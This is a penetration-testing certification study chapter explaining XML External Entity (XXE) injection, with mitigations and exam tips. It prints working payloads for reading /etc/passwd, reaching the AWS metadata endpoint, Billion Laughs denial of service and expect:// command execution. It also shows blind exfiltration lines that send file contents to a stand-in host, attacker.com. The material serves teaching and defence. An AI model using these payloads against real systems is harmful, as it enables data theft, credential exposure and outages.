PT0-002Chapter 65 of 104Objective 3.2

XXE Injection Attacks

This chapter covers XML External Entity (XXE) Injection attacks, a critical vulnerability that appears in the PT0-002 exam under Attacks and Exploits (Objective 3.2). XXE attacks exploit XML parsers that process external entities, leading to data disclosure, server-side request forgery, denial of service, and remote code execution. Expect 2-4% of exam questions to involve XXE, often in the context of web application penetration testing or API security assessments.

25 min read
Intermediate
Updated May 31, 2026

The Parcel Delivery Scam

Imagine a company's mailroom. Employees send internal requests using forms that include a 'reply-to' address. The mailroom clerk processes these forms as instructed. A malicious employee submits a form that says: 'Please retrieve the contents of the CEO's safe and deliver them to me.' The clerk, following protocol, executes the request. In XML External Entity (XXE) injection, the XML parser is the mailroom clerk. The application sends XML data to the parser, which processes entity references. An attacker crafts XML that includes an external entity pointing to a sensitive file (like /etc/passwd) or a network resource. If the parser is not configured to disable external entities, it will fetch and include that content in the output. This is like the clerk opening the safe and handing over the contents. The attack works because the parser blindly trusts the entity definition. Mitigation is like training the clerk to ignore any request that references external resources—disabling DTDs or external entity processing altogether. The mechanism is identical: the parser expands the entity and substitutes its value, potentially leaking data or causing server-side request forgery (SSRF) if the entity points to an internal URL.

How It Actually Works

What is XXE Injection?

XXE Injection is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. The attacker can use this to disclose internal files, perform SSRF attacks, cause denial of service (e.g., Billion Laughs attack), or in some cases achieve remote code execution.

How XML Entities Work

XML documents can define entities in a Document Type Definition (DTD). Entities are like variables that hold text or binary data. There are two types: internal entities (defined inline) and external entities (loaded from an external source). An external entity is defined using the SYSTEM keyword followed by a URI. For example:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

When the parser encounters &xxe;, it replaces it with the content of /etc/passwd. If the application returns this data in the response, the attacker reads the file.

XXE Attack Vectors

1.

In-band XXE: The attacker receives the file content directly in the application's response. This is the simplest and most common in exam scenarios.

2.

Blind XXE: The application does not return the entity content directly. The attacker must use out-of-band (OOB) techniques, such as sending the data to an attacker-controlled server via HTTP request. For example:

<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "file:///etc/passwd">
  <!ENTITY % callhome SYSTEM "http://attacker.com/?data=%xxe;">
]>
<root>&callhome;</root>

This uses parameter entities (%) to chain the file read into a request to the attacker's server.

3.

Error-based XXE: The attacker forces the parser to include the file content in an error message. For instance, using a non-existent file path that includes the sensitive data in the error output.

Key Components and Defaults

DTD (Document Type Definition): The XML specification allows DTDs to define entity structure. Many parsers process DTDs by default.

External entities: Defined with SYSTEM or PUBLIC identifiers. The URI can be file://, http://, ftp://, etc.

Parameter entities: Used only in DTDs, denoted by %. They are useful for chaining attacks.

XML parsers: Common vulnerable parsers include libxml2 (PHP), Xerces (Java), and MSXML (ASP.NET). By default, many parsers allow external entity expansion.

How to Identify XXE

During a penetration test, look for:

XML input in requests (e.g., SOAP, REST APIs, file uploads like .docx, .svg).

Any response that reflects user input or processes XML.

Error messages that include file paths or internal server information.

Test payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY test SYSTEM "file:///etc/passwd">
]>
<root>&test;</root>

If the response contains the contents of /etc/passwd, XXE is present.

Exploitation Examples

File Disclosure:

<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">

SSRF:

<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">

This accesses AWS metadata, potentially exposing IAM credentials.

Denial of Service (Billion Laughs):

<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
...
<root>&lol9;</root>

This causes massive entity expansion, consuming memory and CPU.

Mitigation Techniques

Disable DTDs entirely: In most parsers, set setFeature("http://apache.org/xml/features/disallow-doctype-decl", true).

Disable external entities: For Java, use setFeature("http://xml.org/sax/features/external-general-entities", false).

Use less complex data formats: JSON or YAML are not vulnerable to XXE.

Input validation: Schema validation can help but is not foolproof.

Patch and update: Keep XML parsers up-to-date to avoid known vulnerabilities.

Interaction with Other Technologies

XXE can be combined with SSRF to pivot into internal networks. For example, an XXE that reads http://internal-server/ can be used to scan internal hosts. It can also be used to trigger deserialization attacks if the parser supports XInclude or other processing instructions.

Command Examples

In a Java application, secure parser configuration:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

In Python (lxml):

from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)
tree = etree.parse(xml_input, parser)

Walk-Through

1

Identify XML Input Points

The first step is to locate all places where the application accepts XML input. Common locations include SOAP endpoints, REST APIs with XML content type, file uploads (e.g., .xml, .docx, .svg), and any form that submits data in XML format. Use a proxy like Burp Suite to intercept traffic and inspect content-type headers. Look for `Content-Type: application/xml` or `text/xml`. Also check for hidden XML processing, such as configuration files that are parsed server-side.

2

Craft a Basic XXE Payload

Create a simple XML document that defines an external entity pointing to a known file. For Unix-like systems, use `file:///etc/passwd`; for Windows, `file:///c:/windows/win.ini`. Include the entity reference in the document body. Send this payload to the identified input point and observe the response. If the file contents appear in the response, the application is vulnerable to in-band XXE. If not, proceed to blind XXE techniques.

3

Test for Blind XXE

If the response does not include the file contents, attempt out-of-band (OOB) data exfiltration. Set up a listener on an attacker-controlled server (e.g., using netcat or a web server). Craft a payload that uses parameter entities to make an HTTP request to your server, including the file content in the URL or body. For example: `<!ENTITY % xxe SYSTEM "file:///etc/hostname"> <!ENTITY % callhome SYSTEM "http://attacker.com/?data=%xxe;">`. The attacker server logs the request, revealing the hostname.

4

Exploit for SSRF

XXE can be used for Server-Side Request Forgery (SSRF). Change the entity URI to an internal service, such as `http://169.254.169.254/latest/meta-data/` (AWS) or `http://localhost:8080/admin`. If the response includes the internal resource content, the application is vulnerable to SSRF. This can lead to accessing cloud metadata, internal APIs, or scanning internal networks.

5

Escalate to RCE or DoS

In some cases, XXE can lead to remote code execution if the parser supports PHP wrappers like `expect://` or if the application allows file writing via SSRF. Test with `expect://id` for PHP. For denial of service, use the Billion Laughs attack: a recursive entity expansion that consumes memory. Send a payload with deeply nested entities and monitor server performance. If the server becomes unresponsive, it is vulnerable to DoS.

What This Looks Like on the Job

Scenario 1: SOAP API in a Financial Application

A bank's internal SOAP API processes loan applications. The API accepts XML payloads for data exchange. A penetration tester discovers that the XML parser is configured with default settings, allowing external entities. By sending an XXE payload that reads /etc/shadow, the tester extracts password hashes. The bank then disables DTD processing entirely and switches to JSON for sensitive endpoints. The fix: in Java's DocumentBuilderFactory, set disallow-doctype-decl to true. Performance impact is negligible, but legacy systems required careful regression testing.

Scenario 2: SVG File Upload in a Social Media Platform

A social media site allows users to upload SVG images (which are XML-based). An attacker uploads an SVG containing an XXE payload that reads the server's /etc/passwd and embeds it in the image. The server renders the SVG and returns the file contents as part of the image metadata. The attacker then uses this to pivot to other internal services. The fix: validate SVG files by stripping XML entities and using a secure parser. The company also implemented content security policies to limit data exfiltration.

Scenario 3: Document Conversion Service

A cloud document converter accepts .docx files (which are ZIP archives containing XML). An attacker modifies the document.xml file inside a .docx to include an XXE payload that targets the internal network's Active Directory server. When the converter processes the file, it performs an SSRF request to http://adserver/ and returns internal network information. The attack is blind, but the attacker uses OOB exfiltration to a controlled domain. The fix: the service now unzips files and validates XML in a sandboxed environment with no network access. The conversion speed decreased by 5%, but security improved significantly.

How PT0-002 Actually Tests This

PT0-002 Objective 3.2: Given a scenario, exploit vulnerabilities in application-based services.

The exam tests your ability to identify and exploit XXE vulnerabilities. Key areas:

Recognize XML input points (SOAP, REST, file uploads).

Craft basic and blind XXE payloads.

Understand the difference between in-band and out-of-band techniques.

Know how to exfiltrate data using parameter entities.

Identify SSRF as a consequence of XXE.

Common Wrong Answers

1.

"XXE only works with file:// protocol" – Wrong. XXE can use http://, ftp://, php://, etc. The exam tests SSRF via http://.

2.

"Blind XXE cannot be exploited" – Wrong. Blind XXE can be exploited using OOB channels, error messages, or timing attacks.

3.

"XXE only affects PHP applications" – Wrong. Any language with an XML parser is vulnerable, including Java, .NET, Python, etc.

4.

"Disabling external entities prevents all XXE" – Partially true, but if DTDs are still enabled, parameter entities can still be used. The best practice is to disable DTDs entirely.

Specific Exam Values

Default parsers often allow external entities (e.g., libxml2 before version 2.9.0).

AWS metadata endpoint: http://169.254.169.254/latest/meta-data/

Typical file targets: /etc/passwd, c:\windows\win.ini

Parameter entity syntax: <!ENTITY % name SYSTEM "URI">

OOB exfiltration uses <!ENTITY % callhome SYSTEM "http://attacker.com/?%file;">

Edge Cases

XXE in JSON endpoints: Some applications accept XML even if the endpoint is JSON. Test by changing Content-Type to application/xml.

XXE via XInclude: Even if DTDs are disabled, XInclude can process external files. Test with <xi:include href="file:///etc/passwd" parse="text"/>.

XXE in binary formats: Office documents (OOXML) are ZIP files containing XML. Modify the XML inside.

How to Eliminate Wrong Answers

Focus on the mechanism: if the parser processes external entities, it can read files or make requests. If the response reflects the entity value, it's in-band. If not, it's blind. Always look for the ability to control XML input. Eliminate answers that claim XXE is impossible without DTDs (XInclude is an alternative) or that only affect specific languages.

Key Takeaways

XXE exploits XML parsers that process external entities.

Always test XML input points with a simple file read payload (e.g., /etc/passwd).

Blind XXE can be exploited using OOB exfiltration via parameter entities.

Disable DTDs entirely to fully mitigate XXE; disabling external entities is insufficient.

XXE can lead to SSRF, file disclosure, DoS, and in some cases RCE.

Common exam targets: AWS metadata endpoint (169.254.169.254), local files, internal services.

Parameter entities are defined with % and are only usable within DTDs.

Easy to Mix Up

These come up on the exam all the time. Here's how to tell them apart.

In-band XXE

File content returned directly in response

Easier to exploit and verify

Requires application to reflect entity value

Common in SOAP APIs with verbose errors

No need for external server

Blind XXE

File content not returned directly

Requires out-of-band or error-based exfiltration

Works even without reflection

Common in REST APIs that suppress errors

Requires attacker-controlled server or DNS

Watch Out for These

Mistake

XXE only works if the application returns the file content in the response.

Correct

Blind XXE does not require direct reflection. Data can be exfiltrated via out-of-band channels (DNS, HTTP), error messages, or timing differences.

Mistake

Disabling external entities fully mitigates XXE.

Correct

Disabling external entities helps, but if DTDs are still enabled, parameter entities can still be used for some attacks. The safest approach is to disable DTDs entirely.

Mistake

XXE is only a web application vulnerability.

Correct

XXE can occur in any application that parses XML, including desktop software, mobile apps, and IoT devices. The exam focuses on web applications, but the principle applies broadly.

Mistake

XXE cannot be used for SSRF.

Correct

XXE is a common vector for SSRF. By setting the entity URI to an internal URL, the server makes a request to that resource, which can be used to access internal services.

Mistake

XXE requires the attacker to have direct access to the server's file system.

Correct

XXE exploits the XML parser's ability to fetch resources from URIs. The attacker does not need direct access; the parser does the work on the server's behalf.

Do You Actually Know This?

Reveal each answer, then mark whether you got it right. Score 60%+ to unlock the next chapter.

Frequently Asked Questions

What is the difference between internal and external entities in XML?

Internal entities are defined inline within the DTD and their value is a string literal. External entities reference an external resource via a URI, using the SYSTEM or PUBLIC keyword. The XML parser fetches the resource and expands the entity. In XXE, attackers exploit external entities to read local files or make network requests.

How do I test for XXE in a web application?

Identify endpoints that accept XML (e.g., Content-Type: application/xml). Send a payload like `<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>`. If the response contains the file content, it's vulnerable. If not, try blind techniques like OOB exfiltration or error-based XXE.

What is the Billion Laughs attack?

The Billion Laughs attack is a denial-of-service (DoS) attack against XML parsers. It uses nested entity references that expand exponentially, consuming memory and CPU. For example, defining `lol2` as ten copies of `lol`, `lol3` as ten copies of `lol2`, etc., quickly leads to massive expansion. This can crash the parser or the application.

Can XXE be used to achieve remote code execution?

In some cases, yes. If the application uses a parser that supports PHP wrappers (e.g., `expect://`), an attacker can execute system commands. Also, if the parser allows writing files via SSRF (e.g., using `file://` to write to a web directory), RCE may be possible. However, these are less common in exam scenarios.

What is the best way to fix XXE vulnerabilities?

The most effective fix is to disable DTD processing entirely in the XML parser. For Java, use `setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)`. For Python lxml, set `resolve_entities=False`. If DTDs must be supported, at least disable external entities and parameter entities. Also consider using JSON instead of XML where possible.

How does XXE relate to SSRF?

XXE can be used to perform Server-Side Request Forgery (SSRF) by defining an external entity with an HTTP URI pointing to an internal resource. The server will make a request to that URI, potentially accessing internal services or cloud metadata. This is a common exam topic.

What is the role of parameter entities in XXE?

Parameter entities (defined with `%`) are used only within DTDs. They are essential for blind XXE attacks because they allow chaining: one parameter entity reads a file, and another makes an outbound request containing that data. They cannot be used in the document body directly.

Terms Worth Knowing

Ready to put this to the test?

You've just covered XXE Injection Attacks — now see how well it sticks with free PT0-002 practice questions. Full explanations included, no account needed.

Done with this chapter?